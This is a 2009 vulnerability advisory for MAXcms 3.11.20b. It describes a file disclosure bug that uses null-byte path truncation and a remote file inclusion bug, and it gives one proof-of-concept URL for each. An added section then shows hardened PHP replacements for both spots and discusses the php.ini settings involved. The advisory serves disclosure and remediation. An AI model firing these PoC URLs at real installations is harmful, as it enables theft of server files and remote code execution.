
# Title : MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities
# Published : 2009-08-03
# Author : GoLd_M


MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities
I- Remote File Disclosure Vulnerabilities
In /includes/inc.thcms_admin_dirtree.php (lines 22-25):

if ($_GET["getjs"]=="1") {                                      <<-------!!
    readfile($thCMS_root."/includes/wz_dragdrop.js");           <<-------!!
    exit;
}

$thCMS_root is never read from $_GET explicitly, so when the file is requested directly it is only populated from the query string if register_globals is enabled (PHP < 5.4, off by default since 4.2). The trailing %00 in the PoC truncates the concatenated path at the null byte, so "/includes/wz_dragdrop.js" is never appended and readfile() returns whatever path was supplied; this truncation only works on PHP before 5.3.4, which started rejecting paths containing NUL. Under those conditions any file the web server can read, not just the script itself, can be requested.

POC :
     http://localhost//microcms/includes/inc.thcms_admin_dirtree.php?getjs=1&thCMS_root=inc.thcms_admin_dirtree.php%00
                                              #####################
II- Remote File Inclusion Vulnerabilities
In /includes/file_manager/special.php (lines 1-9):

<?php
/**
*    $af_pk is passed in here.
*    It is the PK from the adovo_filedata table for the single record.
*/

include($fm_includes_special);                                  <<-------!!

?>

$fm_includes_special is likewise an unset variable that arrives straight from the request under register_globals and is handed to include() with no allowlist. With allow_url_include enabled (PHP 5.2+; before 5.2 include() honoured allow_url_fopen) the remote URL is fetched and executed as PHP; even with URL includes disabled the same line still allows local file inclusion of any path on the server.

POC :
     http://localhost//microcms/includes/file_manager/special.php?fm_includes_special=http://localhost/020.txt
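The following is an added example, not code from MAXcms or from this advisory's author. It condenses hardened replacements for both spots above (file disclosure in inc.thcms_admin_dirtree.php and the include() in special.php) into one file for illustration: the JavaScript path is fixed server-side and checked with realpath(), and the file manager include is driven by an allowlist key rather than a path. The placement in /includes/, the allowlist keys and the special_*.php file names are assumptions; the code also assumes register_globals=Off so that only the explicit $_GET reads shown here reach it.

```php
<?php
// Added example, not MAXcms code: hardened replacements for the two spots
// in the advisory. Assumptions (not from the advisory): this file sits in
// /includes/, the allowlist keys and target files are hypothetical, and
// register_globals=Off so no unset variable can be populated from the query.

declare(strict_types=1);

// I- File disclosure fix: the asset path is built entirely server-side and
// resolved with realpath(), so nothing from the request reaches readfile().
function serve_dragdrop_js(array $get): bool
{
    if (!isset($get['getjs']) || $get['getjs'] !== '1') {
        return false;                                   // not our request
    }
    $root = realpath(__DIR__ . '/..');                  // assumption: install root
    $js   = realpath(__DIR__ . '/wz_dragdrop.js');      // fixed file, no variable root
    // realpath() returns false for a missing file; the prefix test rejects a
    // symlinked wz_dragdrop.js that points outside the install directory.
    if ($root === false || $js === false
        || strncmp($js, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        http_response_code(404);
        return true;
    }
    header('Content-Type: application/javascript');
    readfile($js);
    return true;
}

// II- RFI fix: the request selects a key, never a path. Only files named in
// the allowlist can be included, so http:// URLs and ../ traversal never
// reach include(). Keys and file names below are hypothetical.
const FM_SPECIAL_ALLOWLIST = [
    'upload' => __DIR__ . '/file_manager/special_upload.php',
    'rename' => __DIR__ . '/file_manager/special_rename.php',
];

function resolve_special_include(array $get): ?string
{
    $key = $get['fm_includes_special'] ?? '';
    if (!is_string($key) || !array_key_exists($key, FM_SPECIAL_ALLOWLIST)) {
        return null;                                    // unknown or non-scalar key
    }
    return FM_SPECIAL_ALLOWLIST[$key];
}

// Dispatch: serve the script if asked for, otherwise run the selected action.
if (serve_dragdrop_js($_GET)) {
    exit;
}
$target = resolve_special_include($_GET);
if ($target === null) {
    http_response_code(400);
    exit('unknown file manager action');
}
include $target;
```

Both fixes remove the request-controlled string from the filesystem call rather than trying to filter it; null-byte and "http://" checks on $thCMS_root or $fm_includes_special would still leave local traversal open. As defence in depth, allow_url_include=Off and register_globals=Off in php.ini stop the two PoCs above even on an unpatched install, but do not close the underlying local file inclusion.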

Thanx To : Tryag.Cc

# www.Syue.com [2009-08-03]